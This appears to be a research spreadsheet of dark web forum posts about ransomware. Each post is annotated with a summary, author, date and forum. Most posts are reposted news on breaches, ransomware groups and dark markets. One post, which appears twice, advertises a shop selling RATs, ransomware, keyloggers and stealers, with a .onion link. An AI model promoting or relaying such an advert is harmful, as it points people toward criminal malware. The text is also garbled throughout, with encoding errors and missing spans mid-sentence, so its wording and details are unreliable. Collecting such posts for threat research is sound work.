    <t>;read this article on deepwebfeed;;canadian aircraft manufacturer bombardier inc. is the latest victim of a cyberattack with stolen data published on the dark web.;;bombardier tuesday described the attack as a ���limited cybersecurity breach��� that involved an ���unauthorized party accessed and extracted data by exploiting a vulnerability affecting a third-party file-transfer application.��� the dark web is a shady corner of the internet where illicit goods and services, including data troves, are bought and sold.;;according to the company, the data stolen included personal and other confidential information relating to employees, customers and suppliers. bombardier then ticked off the standard list of responses follow an attack ��� informing those who have had their data stolen, employing third-party cybersecurity and forensic professions, and notifying appropriate authorities, including law enforcement.;;although bombardier may have been somewhat light in providing details, whs to the form of attack: it appeared on a site run by the clop ransomware gang, according to zdnet.;;another hint as to how the attack took place is in bombardier���s mention that access was obtained by ���exploiting a vulnerability affecting a third-party file-transfer application.��� recent clop ransomware attacks, including those targeting law firm jones day and the office of the washington state auditor, involved exploiting a vulnerability in software from accellion inc.;;even though bombardier has not confirmed that the attack involved ransomware, previous clop attacks, including one targeting german tech giant software ag, involved a demand for a payment of about $20 million with a threat that if the ransom isn���t paid, the data stolen in the attack would be published online.;;���the breach announced by bombardier follows a feb. 22 announcement by accellion acknowledging attacks against its legacy file transfer application,��� john shier, senior security advisor at sld siliconangle. ���the significance of this breach is notable not only by its latest victim but also in the aggregate of previous leaks attributed to the same criminal group and using the same vulnerability. it highlights the potential risks posed by legacy applications that are allowed to persist in production networks.���;;trevor morgan, product manager with data security specialists comforte ag, said the lesson here is that software should always be up-to-date or replaced with next-generation software that���s supported by the vendor.;;���if you think you���re safe from breaches like this, then it���s probably time you really reconsider your data security strategy and methods,��� morgan added. ���complacency is your worst enemy and if you���re still depending on security methods that protect borders and perimeters, it���s probably time to think from a more data-centric perspective. if the data is the valuable part, protect the data and not the waell.�</t>
  </si>
  <si>
    <t xml:space="preserve">Post describing ransomware attack on Bombardier. </t>
  </si>
  <si>
    <t>505b8af4166a4d673f4b</t>
  </si>
  <si>
    <t>Cyberattack on Bombardier Results in Stolen Data Published on The Dark Web</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;how's your 'probiv'? how about customer service? here's how dark web forums connect cybercriminals looking for talent with those looking for work -- and which skills are hot right now.;;the dark web is a cesspool of illegal activity, from underground drug trades to the buying and selling of stolen credit card information. it's also a place to find financial opportunity and gainful employment.;;yes, there are "criminal job boards" in the traditional sense on the dark web. the edge spoke with several security researchers, including the photon research team at digital shadows, about the growing number of english- and russian-language dark web forums that feature job boards with specific sections dedicated to the topic of recruitment and the skills required.;;how does it work? much like a regular job board.;;;the application process;;job seekers and criminal "employers" find each other through posts. wannabe hackers will create threads in specific sections of a forum for topics, such as malware and phishing, and explain their skillsets in order to find work. and criminal groups, or even individual threat actors looking for help, will also announce when they are seeking assistance and then outline the requirements.;;sometimes these listings get more creative ��� and competitive, the photon researchers say. for example, over on the russian-language forum xss, the sodinokibi/revil ransomware collective sponsored a competition for criminal job seekers in december 2019. the contest asked forum members to submit a technical paper on a selected topic. the winner was offered the chance to work for the collective.;;at the english-language hacking forum kickass, the photon team spotted the dark overlord (tdo) hacking group actively recruiting new members. tdo listed specific key attributes the successful candidate should possess.;;;the skills in demand;;what skills are the mostmand on the black market? the photon research team says "probiv" ��� a russian-language slang term best translat"look-up" ��� is a popular skill, and criminal groups are continually looking for people to join who might work in a specific sector or company who can bring probiv abilities to the table.;;criminals who provide probiv services typically find lucrative work by abusing privileged job positions, such as roles in banks and passport agencies, and then provide insider information in exchange for a fee. threat actors recruit workers with access to specific databases, according to photon.;;ransomware groups, on the other hand, are looking for a variety of skills to complement whatever talents they already possess on their teams. chester wisniewski, principal research scientist at sophos, recently observed that ce"criminal specialties" are called for in forums in order to form a team that can help with various steps in the ransomware exploit chain.;;for example, one team member might be an "initial access broker" specializing in gaining access to secure systems. the next might bring coding skills and author the malware.;;"there appears to be a delineation of responsibilities," wisniewski says. "it is clear in some cases that those coding the malware are not the same as the people providing technical support chat in english. there also seems to be different groups acquiring an initial foothold than the groups conducting the ransom and extortion. we see similar things in the stolen credit world, where many card thieves then sell their cards to 'cashers' or go into business with them on a commission basis.";;;training for criminal employment;;how do criminals get their training? is there any kind of formalized training module a young, industrious hacker can hit up to learn?;;the photon team has not observed any formal courses on the dark web but says knowledge and expertise is shared among junior members of dark web forums all the time, including prepared guides and tutorials on how to conduct certain activities. photon has also seen dark web platforms like xss offer their own dedicated e-learning sections on the forum where users can enhance their skills a number of areas.;;similar efforts have been uncovered on the forum cryptbb, where beginners who are not at an advanced skill level are given access to a dedicated "beginners" subsection to learn and increase knowledge. more experienced criminals answer questions and serve as mentors.;;"underground forums for black hat hackers are a free, relatively easy way to learn from other experienced cybercriminals,��� says kristina balaam, senior security engineer for mobile security firm loo"the added benefit is that if a user develops the trust of others in this community, they may be recruited to criminal activities or projects."</t>
  </si>
  <si>
    <t>Post discussing how cybercriminals advertise and recruit positions including in ransomware</t>
  </si>
  <si>
    <t>c77019bd916a5f54108a</t>
  </si>
  <si>
    <t>Cybercrime 'Help Wanted': Job Hunting on the Dark Web</t>
  </si>
  <si>
    <t>key points:;;- online crime increased by 75% during the covid-10 pandemic;- some of the crimes are enabled by cryptocurrencies, due to which increased regulations are being proposed;- work-from-home employees are targeted by malware and ransomware attacks;;;with more people working from home, online crime increased by 75%, some of which are enabled by anonymous cryptocurrencies.;;congressman emanuel cleaver of missouri said an fbi report revealed daily cyber crimes increased by 75% during the covid-10 pandemic. he made his opening remark during the united states house meeting on illegal digital activities.;;according to cointelegraph, tom kellermann, head of cybersecurity at vmware, said the finance industry got hit the hardest with a 238% increase in related digital crime and a 900% increase in ransomware attacking the industry.;;in a separate report earlier this year, cybersecurity firm kaspersky also noted financial institutions were a hotbed for attackers, and they are notable because there is a direct monetary loss if an attacker is successful.;;kellerman also cited an increase in crypto exchange hacks and leaks. many crypto assets are being used in dark web forums ���to create a bazaar for criminals and organized crime to reach a global market,��� he added. he argued in favor of more regulation for digital money because ���payment systems and cryptocurrencies offer true or relative anonymity.���;;the reality is that many of these cryptocurrencies on public blockchains "pseudonymous"). any transaction using bitcoin is broadcasted on the blockchain for anyone to see that it took place, as well as the public addresses of the sender and receiver. the blockchain even reveals how much bitcoin an address has. what���s missing is the personal information of those who are parties to the transaction. however, even that can be tracked depending on the purchase origin. coinbase, for example, knows the identities of those who purchase bitcoin through their app.;;in order to contain the spread of covid-19, many businesses closed, and some companies opted for their employees to work at home. these became opportunities for the hackers to prey on work-at-home employees who access company websites and databases from unsecured home connections.;;according to security company riskiq, the most common ransomware comes in the form of email attachments. some of these emails are specifically tailored as if to provide information about the coronavirus. once the attachment is downloaded and installed, it wieal itself to be a malware. the security firm is advising people to connect only to the company network using the company-issued laptop, multifactor authentication and secure the home router.</t>
  </si>
  <si>
    <t>Post describing how cybercrime and cryptocurries interact with one another and the changes in this during covid -19</t>
  </si>
  <si>
    <t>/u/OnionUrl</t>
  </si>
  <si>
    <t>18/06/2020 02:02</t>
  </si>
  <si>
    <t>/d/OnionURL</t>
  </si>
  <si>
    <t>9772c5a8f481cd202ef9</t>
  </si>
  <si>
    <t>Cybercrime And Cryptocurrency Exchange Hacks Up By 75% During Coronavirus Pandemic, FBI Reveals</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;pysa ransomware is targeting education institutions in the united states and the united kingdom. it has been denounced by an fbi alert. according the cybersecurity experts, the malware (aka mespinoza) is capable of exfiltrating data and encrypting users��� critical files and data stored on their systems.;;the unidentified cybercrime actors have specifically targeted higher education, k-12 schools, and seminaries. these use pysa to exfiltrate data from victims prior to encrypting victim���s systems to use as leverage in eliciting ransom payments. since march 2020, the fbi has become aware of pysa ransomware attacks against us and foreign government entities, educational institutions, private companies, and the healthcare sector by unidentified cyber actors. in previous incidents, cyber actors exfiltrated employment records that contained personally identifiable information (pii), payroll tax information, and other data that could be used to extort victims to pay acording the cybersecurity experts, pysa typically gains unauthorized access to victim networks by compromising remote desktop protocol (rdp) credentials and/or through phishing emails. the cybercrime actors use advanced port scanner and advanced ip scanner1 to conduct network reconnaissance, and proceed to install open source tools, such as powershell empire2, koadic3, and mimikatz4. they execute commands to deactivate antivirus capabilities on the victim network prior to deploying the ransomware.;;then, they exfiltrate files from the victim���s network, sometimes using the free open- source tool winscp5, and proceed to encrypt all connected windows and/or linux devices and data, rendering critical files, databases, virtual machines, backups, and applications inaccessible to users. the ransom message contains information on how to contact the actors via email, displays faqs and offers to decrypt the affected files. if the ransom is not met, the actors warn that the information will be uploaded and monetn the darknet.</t>
  </si>
  <si>
    <t>Post discussing the PYSA ransomware strain as it's attacks on US and UK education systems</t>
  </si>
  <si>
    <t>25/03/2021 22:44</t>
  </si>
  <si>
    <t>6f8a8b3870cfca0eda78</t>
  </si>
  <si>
    <t>Cybercrime, PYSA Ransomware Targets Education Institutions in US and UK</t>
  </si>
  <si>
    <t>hi, as someone who has worked in this business for a few years, i've never seen the pay as the main appeal for becoming a "blackhat". i still work a regular job and im nowhere close to the six-figure bitcoin lifestyle portrayed by the public image of a successful cybercriminal on the deep web. i used to dabble in some ransomware back in its golden age and was really disappointed with how little that earned but i continued because i enjoyed making it.;;so i'm wondering whether there is actually any money in cybercrime. have you made more than a little with your hacking skills? if so, what particular field did you pursue? i've looked into maas, phishing, cryptomining malware, keyloggers/banking scripts, ddos services, and link spamming/adware.;;i'm trying to get off the ground myself, and i'd appreciate any hints or indication of where i should be looking. maybe there are some people on here who can relate to my fruitless efforts</t>
  </si>
  <si>
    <t>User working a regular job asking what is the appeal of cybercrime such as ransomware and do they many any income from this?</t>
  </si>
  <si>
    <t>/u/pric3d</t>
  </si>
  <si>
    <t>21/07/2021 06:47</t>
  </si>
  <si>
    <t>bf72ff3ab746f973b626</t>
  </si>
  <si>
    <t>Cybercriminals, how do you make your living?</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the auction was held on a popular hacking forum on the dark web, and the bidding started at $1 million, according to vx-underground. the auction concluded shortly after, once hackers received a satisfying bid, per kela research.;;cd projekt red the developer behind the much-touted game cyberpunk 2077 was speciously hacked and massive sensitive data were stolen. this after a catastrophic release of the continuously delayed cyberpunk 2077 earlier. hacked data include the source code for games like cyberpunk and it's another popular franchise, the witcher.;;one of the threats from hackers was that if cd projekt red did not give them money, they would make public the information they had stolen, including the source codes of their current games. this means that many people could start creating games that are identical to cyberpunk 2077 to try to scam the internet.;;the company immediately made it known that they had no intention of negotiating with the people who attacked them and in response to this, the hackers decided to sell the source codes of the aforementioned titles on the black market, that is, the dark web.;;the dark web monitoring organization kela reports that an auction set up to sell the files has now closed after a "successful bid" was made from outside the forum it was being held on. that offer reportedly stipulates that the code will no longer be distributed or sold. the cybersecurity account vx-underground also reported that they had heard that the sale was completed.;;speaking to ign, victoria kivilevich, kela's threat intelligence analyst, explained that it appears that all the stolen files, which include the source code for cyberpunk 2077, multiple versions of the witcher 3, and gwent, were sold in one package. it is still unclear who the buyer is or what they intend to do with the files as of this writing.;;while not yet confirmed, several cybersecurity experts have pointed out that the ransomware attack came from a group called hellokitty, based on the title and content of the ransom note released by cd projekt after the attack.</t>
  </si>
  <si>
    <t>Post discussing the data stolen from CD Projeck red being released on the dark web for sale</t>
  </si>
  <si>
    <t>24/02/2021 15:07</t>
  </si>
  <si>
    <t>3352e6542963f73104ea</t>
  </si>
  <si>
    <t>Cyberpunk 2077 and The Witcher 3 Stolen Source Code Reportedly Auctioned on The Dark Web</t>
  </si>
  <si>
    <t>the department of justice seized ���approximately half a million dollars��� in cryptocurrency from accounts owned by alleged hackers.;;on july 19, the justice department announced a complaint filed in the district of kansas to forfeit approximately half a million dollars worth of cryptocurrency from ���cryptocurrency accounts��� owned by purported hackers from the democratic people���s republic of korea (dprk).;;���thanks to rapid reporting and cooperation from a victim, the fbi and justice department prosecutors have disrupted the activities of a north korean state-sponsored group deploying ransomware known as ���maui,������ deputy attorney general lisa o. monaco said at the international conference on cyber security. ���not only did this allow us to recover their ransom payment as well as a ransom paid by previously unknown victims, but we were also able to identify a previously unidentified ransomware strain. the approach used in this case exempliber activity from all angles to disrupt bad actors and prevent the next victim.���;;according to an announcement from the department of justice (doj), north korean hackers used a ransomware strain called maui to encrypt the files and servers of a hospital in kansas in may 2021. after a week without access to their infrastructure and data, the hospital paid the hackers approximately $100,000 in bitcoin to decrypt their files. after being infected by the ransomware, the hospital cooperated with law enforcement agencies, including the federal burea of investigation (fbi). because of their cooperation, the fbi identified ���never-before-seen north korean ransomware��� and traced the bitcoin payment to a money-launderer in china.;;in april 2022, the fbi learned that the hackers had received another payment of approximately $120,000 worth of bitcoin. an investigation into the payment revealed that a medical provider in colorado had paid a ransom to the same hacking group.;;in may 2022, the fbi seiency accounts the hackers had used to receive ransom payments. after the seizure, the district of kansas moved to forfeit the bitcoin and return it to the healthcare providers.</t>
  </si>
  <si>
    <t>Department of justice seized cryptocurrency from a north korean state sponsered ransomware group Maui</t>
  </si>
  <si>
    <t>/u/AlphaBeta</t>
  </si>
  <si>
    <t>23/07/2022 17:50</t>
  </si>
  <si>
    <t>453b610c1d437f815432</t>
  </si>
  <si>
    <t>DOJ Seized Almost $500k in Cryptocurrency from Hackers</t>
  </si>
  <si>
    <t>by janene pieters;;the dutch police are concerned about an increasingly popular development in cybercrime, which the police refer to as cybercrime-as-service. criminals can now buy cyber attacks easily, cheaply and at any time of day or night, the police said in a statement.;;"a new cyber-criminal service sector has emerged online in recent years. there are services available for every step in the criminal process, the so-called cybercrime-as-service. the purchase of your own ddos attacks or phishing email then comes with a 24/7 help desk", said theo van der plas, digitalization and cybercrime program director at the police.;;these cybercrime services are widely available and relatively cheap. "this means that criminals with little digital knowledge can commit crimes and make a large number of victims with relatively little effort", van der plas said. "on the one hand we now see that serious criminals take control of the online world, for example by trading in drugs and weapons or extorting companies with ransomware. on the other hand, there is the ease with which young people make use of such services, for example by targeting their school with a ddos attack.";;in the past year, ddos attacks left a number of dutch banks, the tax authority, customs and digid unreachable for periods of time. ransomware remained a problem and phishing continued to grow, the police said. a new type of cybercrime also emerged - formjacking, in which criminals copy a website very closely and thereby steal details customers enter thinking they are on the original site.;;last year the police conducted 299 regular cybercrime investigations and 43 complex investigations. "there was also a lot of capacity involved in international urgent requests for investigation in other countries. as a result, we were able to pick up slightly fewer investigations than agreed. nevertheless, this is a good result and an upward trend, especially given the fact that four years ago we were still conducing around 80 cybercrime investigations on annual basis", van der plas said.;;on wednesday the national coordinator for counter-terrorism and security nctv released its annual cyber security assessment for the netherlands. in it the nctv warned that the netherlands' dependence on digital systems poses a risk to national security. the nctv also said that the dutch digital infrastructure is frequently used for cybercrime - the netherlands is second in the world on this front, after the united states.  "this also explains the number of international investigations we are cooperating with", van der plas said.;;[b]https://nltimes.nl/2019/06/13/dutch-police-raise-concerns-cheap-cybercrime-service[\b]</t>
  </si>
  <si>
    <t xml:space="preserve">Post discussing how cheap/easy to access cybercrime services </t>
  </si>
  <si>
    <t>/u/89TCP</t>
  </si>
  <si>
    <t>17/06/2019 07:23</t>
  </si>
  <si>
    <t>/d/DeepDotWeb</t>
  </si>
  <si>
    <t>2e917aa729d822b8df6b</t>
  </si>
  <si>
    <t>DUTCH POLICE RAISE CONCERNS OVER CHEAP CYBERCRIME-AS-SERVICE</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;germany���s biggest tabloid, bild, has reported a major hacking attack from russia on the german banking system and naming ���the state russian hackers from the ���fancy lazarus��� group��� as the culprits. if the attack really took place ��� there is no official confirmation so far ��� it will, as usual, be hard to pin definitively on russian state actors, even if cybersecurity experts blame them. the group of cyber-extortionists known as ���fancy lazarus��� could just as easily be linked to china, north korea or no government at all.;;source: bloomberg;;because of this deniability, us president joe biden had to tread carefully when trying to draw ���red lines��� for russian president vladimir putin at a summit last month: he couldn���t directly tell putin to put an end to cyberattacks. instead, he spoke of not providing refuge to cybercriminals ��� a line of discussion putin tried to deflect by sciprocal basis. that���s a non-starter as a comprehensive system ��� only specific exchanges could theoretically be arranged.;;the deniability of russian state involvement in cyberattacks is, on the one hand, stronger than that of its depredations in ukraine, for example. on the other hand, it seems threadbare to anyone who knows anything about an important russian institution: a dark web marketplace called hydra, which could be the biggest in the world and which couldn���t exist anywhere else. apart from being a major drug intermediary, it has helped build up a network of money-laundering channels for hackers that are hard for non-russians to use.;;the average life span of a dark web marketplace, or dark market ��� an online shopping site on an encrypted and anonymized network such as tor ��� was estimated in 2018 to be about eight months. they collapse under the weight of scams or fall victim to law enforcement action, sometimes prompted by competitors. it���s a jungle ouellers are used to migrating to new venues. older exceptions among dark markets are extremely rare.;;hydra is an exception to end all exceptions. it was started in 2015, had a turnover of some $9.4 million the following year, managed to grow it to $1.4 billion in 2020 and is still going strong. those numbers come from a report by the cybersecurity risk intelligence firm flashpoint and the cryptocurrency analytics firm chainalysis, which also estimates that hydra accounts for more than 75% of dark market revenue worldwide.;;all of that turnover is in crypto. chainalysis puts the share of bitcoin flows from illegal activities at a small fraction of 1%, but, as the analytics firm wrote in its 2021 ���crypto crime report,��� ���the first thing that stands out is russia���s receipt of a disproportionately large share off darknet market funds, which is mostly due to hydra.��� no wonder: in moscow and other russian cities, hydra is the place to procure drugs, mostly distributed as �ouyoung kladmen who can earn thousands of dollars a month hiding orders under park benches, burying them under trees, tacking them to the undersides of mailboxes.;;an illicit market as big and as old as this is, of necessity, an entire ecosystem. it spawns a high demand for money-laundering services which can also be used to legalize proceeds from other kinds of cybercrime than the drug trade. chainalysis and flashpoint describe a major change that took place in hydra���s money-handling practices in 2018. to be able to withdraw their money from hydra, sellers must convert it into russian rubles through a specific range of local providers. that hardly made sellers happy, and, according to the report, some drug sellers now prefer to settle in cash off hydra, burying stashes of currency just like the drug ���treasures.��� but, according to the flashpoint-chainalysis report, the reliance on local services and rubles made money-laundering trails to hydra ���difficult, near impossible, to tracmakes hydra���s money infrastructure valuable to all kinds of local cybercriminals. chainalysis��� ���crypto crime report��� contains a case study of a russian over-the-counter cybercurrency broker that has received $265 million in cryptocurrency since becoming active in ��� perhaps coincidentally ��� 2018. a significant part of the money came from hydra, but other streams flowed in from various ransomware strains and scams. the otc broker also helped customers convert their illicitly gained bitcoin into cash.;;the us department of justice says it managed to recover part of the ransom paid to the hackers who paralyzed the colonial pipeline earlier this year ��� but by the time the bitcoin was recovered, the ransomware creators already could have converted it to rubles using channels that have sprouted around hydra, fed by its reliable volumes.;;in any conversation about hydra, its krysha, or protection, is the elephant in the room. putin���s russia is, increasine power in the hands of law enforcement agencies. legitimate businesses are regularly raided, seized or ruined by these agencies. yet hydra prospers as have few, if any, other dark markets. its creators, who have eyed international expansion but appear to have given up on it, at least temporarily, clearly feel safe in russia. their exclusive reliance on ruble-based financial infrastructure is proof of that. to quote flashpoint and chainalysis: "enforcement scrutiny and competitor chicanery have so far eluded hydra. this may be a mere coincidence, or it could indicate that hydra is more resilient to oscillating geopolitics and law enforcement efforts. the longer hydra operates without major disruption, the more realistic the latter option becomes, with regional financially incentivized stakeholders the only plausible explanation.";;that���s a cautious way of alleging that hydra has powerful protectors at the very top of the russian establishment. russia has repeatedly denied any official connection with cyberattacks. yet as flashpoint and chainalysis note, the scale of the hydra phenomenon would be unlikely without some kind of semi-official sanction.;;russia has few internationally competitive tech companies but lots of engineering talent, including the adventurous kind. a unique amalgam of corruption, cutting edge expertise and a geopolitical stance that makes any attack on western institutions useful on some level to the government makes russia a major player in the cybercrime space. second only to ukraine in cryptocurrency adoption, russia is building a tech competence no other country appears to have the chutzpah to develop.;;can putin do anything about this? that���s likely not the right question to ask. so far, he has no real incentive to attempt a crackdown, especially if the illicit business were to be transparenthe knows and trusts and thus open to rendering services to the state when required. the threat of retaliatory action from the us isn���t compelling enough: as things strand, putin can let the likes of hydra worry about that prospect. and if they are crushed, others can take their place. the dark web is nothing if not resi</t>
  </si>
  <si>
    <t xml:space="preserve">Post describing how ransomware attacks can impact the geopolitical climate </t>
  </si>
  <si>
    <t>40c9f18a0909bf65792f</t>
  </si>
  <si>
    <t>Dark Markets Can Be a Geopolitical Force Multiplier</t>
  </si>
  <si>
    <t>seems interesting, i dont believe it all, i dont think dream is under le control  but who knows whats really going on.;;main article - "while not mentioned in the europol or fbi reports on the international takedown, coveware says the target of the investigation appears to have been dream market. this dark web site was one of the last remaining successors to the infamous silk road marketplace, which specialized in illegal narcotics and was closed by u.s. law enforcement in 2013."    https://www.bankinfosecurity.com/analysis-dark-web-arrests-also-led-to-ransomware-disruption-a-12309;;;coveware blog -;"the announcement by dream market was made on the same day as fbi, europol, and dea officials announced dozens of arrests across a coordinated effort to staunch drug trafficking on the dark web. the announcements sent dark market users rushing to cover their tracks, and the security community speculating if law enforcement had actually been running the site in order to glean as much incriminating evidence as possible.";https://www.coveware.com/blog/dream-market-take-down-causes-ransomware-communication-chaos</t>
  </si>
  <si>
    <t>Post discussing as to whether recent ransomware group arrests have hampered attacks</t>
  </si>
  <si>
    <t>information (provider) / debate</t>
  </si>
  <si>
    <t>/u/ijustlovedrugs</t>
  </si>
  <si>
    <t>/d/IndependentNews</t>
  </si>
  <si>
    <t>0f5de78191f6b13dee18</t>
  </si>
  <si>
    <t>Dark Web Arrests Also Led to Ransomware Disruption -  Coveware Says 'Dream Market' Site Shut Down, Hampering Ransomware Attackers</t>
  </si>
  <si>
    <t>0 days 06:08:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;report reveals a booming business for dark web vendors selling everything from emails to hacked crypto accounts.;;despite an explosion in the sheer amount of stolen data available on the dark web, the value of personal information is holding steady, according to the 2021 dark web price index from privacy affairs.;;that leaves these thriving dirty data dealers in a familiar predicament ��� they need to lock down their growing businesses for added privacy and security.;;���as predicted, there is much more volume being sold now compared to last year, with fake-id and credit-card vendors reporting sales in the several thousands,��� the report said. ���not only quantity, but the variety of items to purchase has grown as well, such as hacked crypto accounts and web services like uber accounts.���;;brandon hoffman with netenrich explained to threatpost that he expects these dark web marketplaces to continue to look more like their legit counterparts.;;web markets and standard consumer markets continue to grow,��� hoffman said. ���as can be seen in this report the market on the dark web is starting to follow standard economics. if there is a huge influx in inventory, the price goes down as long as demand remains somewhat steady. if there is a set of inventory with strong demand but the product is deemed to be of higher quality there is premium on that product.���;;a private database of 122,000 u.s. dentists will run about $50 on the dark web, while credit card details for an account with a balance up to $5,000 costs about $240, according to the report, which scoured hundreds of vendors selling stolen data.;;;what is stolen data worth?;;while the going rate for some types of data, like paypal credentials, have dropped because they have become so common, the value of cloned credit cards and personal information about the cardholder shot up, the report found.;;���the price increase is most likely due to a combination of factors, like thtaining the information, the increasing benefit for buyers to use the information, the increased quality/accuracy of the card data, or just good ol��� inflation,��� the report said.;;last year, the price of a cloned mastercard with pin was about $15, the report said. this year, it���s $25, with comparable rise in rates across cloned credit cards. hacked cards from the u.s. with cvv data included are the cheapest, at around $17, because there���s a high supply. israeli cards are the most valuable, fetching $65 each.;;the rise in this area of the business has inspired vendors to adopt more traditional sales techniques, like an 80 percent guarantee on the stolen data, meaning only two out of every 10 cards will either fail or have less than the expected available balance, the report explained.;;;hacked crypto accounts bring big bucks;;the rise of cryptocurrency has made hacked crypto accounts hugely valuable in these dark web marketplaces, the report said. ���due to the skyrocketingryptocurrencies, hacked accounts may hold large sums of coin-based currency and cash, protected by relaxed security measures after the initial verification process.���;;the average price for a hacked coinbase-verified account is $610, the dark web price index said.;;social-media credentials lost value over the past year, thanks in large part to the implementation of multi-factor authentication (mfa), forcing potential threat actors to use time-consuming social-engineering tactics instead, the report found.;;services like video streaming, uber and even fedex accounts are up for sale in these marketplaces too. you can score a hacked uber driver account for $14 or a one-year netflix account for $44.;;physical forged documents are by far the most valuable, followed by document scans and even counterfeit money, which is popular on these dark web marketplaces, some of which are sold with a guarantee to pass the uv pen test used at many retailers, the report said. the most valuable forged document according toark web pricing index was a maltese passport, which costs about $6,500.;;;malware and ddos attacks;;researchers also looked at malware and distributed denial-of-service (ddos) attacks for sale on the dark web.;;���this increase in ransomware attacks are not only from criminal organizations; those with limited resources and technical abilities can also initiate less sophisticated ransomware attacks that can prove quite lucrative,��� kristina balaam with lookout explained to threatpost by email. ���now, we have more individuals attempting to compromise users. they rely on the dark web to purchase the products that allow them to accomplish this.���;;the added that demand, along with the rise in ransomware payments, is contributing to its price, balaam added.;;���with an increasing demand in malware products, malware authors can increase their unit prices and cybercriminals hoping to take advantage of our new online lifestyles are willing to pay,��� balaam said. ���we�omalware prices in this report.���;;;dark web marketplaces need security;;with the volume and value of stolen data growing by leaps and bounds, it was only a matter of time before everyone else caught on, including the cops and other cybercriminals.;;���in an effort to mitigate detection and tracking by law enforcement, the dark web is moving towards increased security on all ends,��� according to the report. ���the markets have abandoned bitcoin (btc) as it is not secure, and vendors are demanding buyers to use monero as payment and communicate only through pgp encryption.��� pretty good privacy (pgp) is an encryption system dating to 1991 that���s used for both sending encrypted emails and encrypting sensitive files.;;this year marks a real milestone in these marketplaces coming of age, austin merritt, an analyst with digital shadows, told threatpost.;;���this past year has been an incredibly unique time for dark web marketplaces, since overall supply and demand haveunities made possible by the chaos of covid-19,��� merritt said. ���outside of market conditions, law-enforcement seizures of marketplaces, forum closures and increased competition among sellers have also added to the unpredictable nature of the landscape.���;;end users are likewise encouraged to harden their security stance against cybercriminals with smart security like anti-malware tools, password hygiene and being aware of skimmers. but privacy affairs stressed that understanding the value of the personal data people use every day might help them think twice about their everyday practices.;;���since most of us do not spend our time shopping in these marketplaces, the most important takeaway from this research is an insight into how valuable personal data can be,��� merritt said. ���it also serves as a reminder for individuals to adopt multi-factor authentication when available, monitor account activity, and critically evaluate inbound emails, texts and pho</t>
  </si>
  <si>
    <t>Post showing increased sales for dark web market data</t>
  </si>
  <si>
    <t>13/03/2021 17:15</t>
  </si>
  <si>
    <t>550ca580abe0c256eb4f</t>
  </si>
  <si>
    <t>Dark Web Markets for Stolen Data See Banner Sales</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the volume of dark web forum members is on the rise, with visitor numbers surging 44% during the first covid-19 lockdowns last year, according to new data from sixgill. the cyber-intelligence firm analyzed five popular english and russian language forums to better understand their popularity over time and who is responsible for most activity.;;collating data from the launch of each forum through to the end of 2020, sixgill found that all five sites had grown their membership exponentially without impacting each other���s popularity. although some grew faster than others, and some months were more successful, the overall trend points towards a continued rise in the number of users visiting dark web sites, the firm concluded.;;this matters, because as the population of the dark web increases, so does criminal activity, according to sixgill security research lead, dov lerner. more interesting still was the fact that user numbers soared into double-digits from january to s2020, before reverting to pre-covid numbers.;;���prior sixgill reports have noted a tremendous uptick in specific types of cybercrime on the underground during the covid lockdowns. this includes gaming store accounts, compromised rdp credentials, money laundering services and narcotics. this research demonstrates that the number of participants in the cyber-underground spiked at the time as well,��� explained lerner.;;���why would coronavirus lockdowns lead to a massive increase in users of dark web forums? some of these users were bored at home and decided to go exploring. others may have been interested in turning to crime amid the economic shocks from the pandemic and the widely covered proliferation of cybercrime targeting remote workers, such as ransomware and phishing.���;;the research also revealed that while user numbers are growing, only a small number seem to be responsible for the vast majority of posts. in fact, the top 20% of frequent posters generated 73% of posts. this mrs of inexperienced threat actors coming merely to observe but not participate in activity, or that experienced users are creating ���burner��� accounts to post from a new username each time, le</t>
  </si>
  <si>
    <t>Post discussing the increase in volume on dark web sittes both for buying and selling stolen data incluing ransomware</t>
  </si>
  <si>
    <t>d29b536b6c0dec0fb8e5</t>
  </si>
  <si>
    <t>Dark Web User Numbers Spiked During COVID-19 Lockdown</t>
  </si>
  <si>
    <t>hello !;i'm a malware developer and seller.;on my shop there are rat, ransomware, keylogger, stealer...;all documentations are public and i provide demo videos.;payments can be made in multiple parts or using escrow services.;i mainly sell source code along with an automatic build script but i can also sell executable files specific to your configuration.;source code is commented and fully tested.;i'm very concerning about opsec: no code is ever uploaded anywhere and i always develop offline.;if you're interested here is the link:;http://darkcorqvqcj3p3g.onion;</t>
  </si>
  <si>
    <t>User promoting their ransomware and other educational resources</t>
  </si>
  <si>
    <t>raas provider (individual) / education (provider)</t>
  </si>
  <si>
    <t>/u/Kelk1</t>
  </si>
  <si>
    <t>24/03/2020 23:36</t>
  </si>
  <si>
    <t>2de67d465ed4e4886609</t>
  </si>
  <si>
    <t>DarkCode: The Malware Shop</t>
  </si>
  <si>
    <t>0 days 11:24:00</t>
  </si>
  <si>
    <t>hello !;i'm a malware developer and seller.;on my shop there are rat, ransomware, keylogger, stealer...;all documentations are public and i provide demo videos.;payments can be made in multiple parts or using escrow services.;i sell source code along with an automatic build script but i can also sell executable files specific to your configuration.;source code is commented and fully tested.;i'm very concerning about opsec: no code is ever uploaded anywhere and i always develop offline.;if you're interested here is the link:;http://darkcorqvqcj3p3g.onion;</t>
  </si>
  <si>
    <t>/d/Blackhat</t>
  </si>
  <si>
    <t>52b7964117c25e431729</t>
  </si>
  <si>
    <t>since the darkside ransomware operation shut down a week ago, multiple affiliates have complained about not getting paid for past services and issued a claim for bitcoins in escrow at a hacker forum.;;russian-language cybercriminal communities typically have an escrow system to avoid scams between sellers and buyers. for ransomware operations, the deposit is a clear statement that they mean big business.;;to gain the trust of potential partners and expand the operation, darkside deposited 22 bitcoins on the popular hacker forum xss. the wallet is managed by the site���s administrator, which in this case acts as a guarantor for the gang and an arbitrator if a dispute occurs.;;revil ransomware last year deposited $1 million worth of bitcoin to a different hacking forum to attract new recruits into the operation. this move showed that they trusted the forum administrator with the money and that there was plenty of money to be made.;;last week, darkside closed shop and informed affiliates that the decision fter losing access to their public-facing servers and it was "due to the pressure from the us" after the attack on colonial pipeline.;;unpaid debts;;darkside���s dissolving of the ransomware-as-a-service (raas) operation was abrupt and clearly left some unfinished business. five partners have complained that the operators owed them money from paid ransoms or from hacking services:;;the first affiliate asking for claim states that they were the 'pentester' for an attack and was owed 80% of the ransom payment. however, after the victim paid, the darkside operators stated they no longer had access to the funds 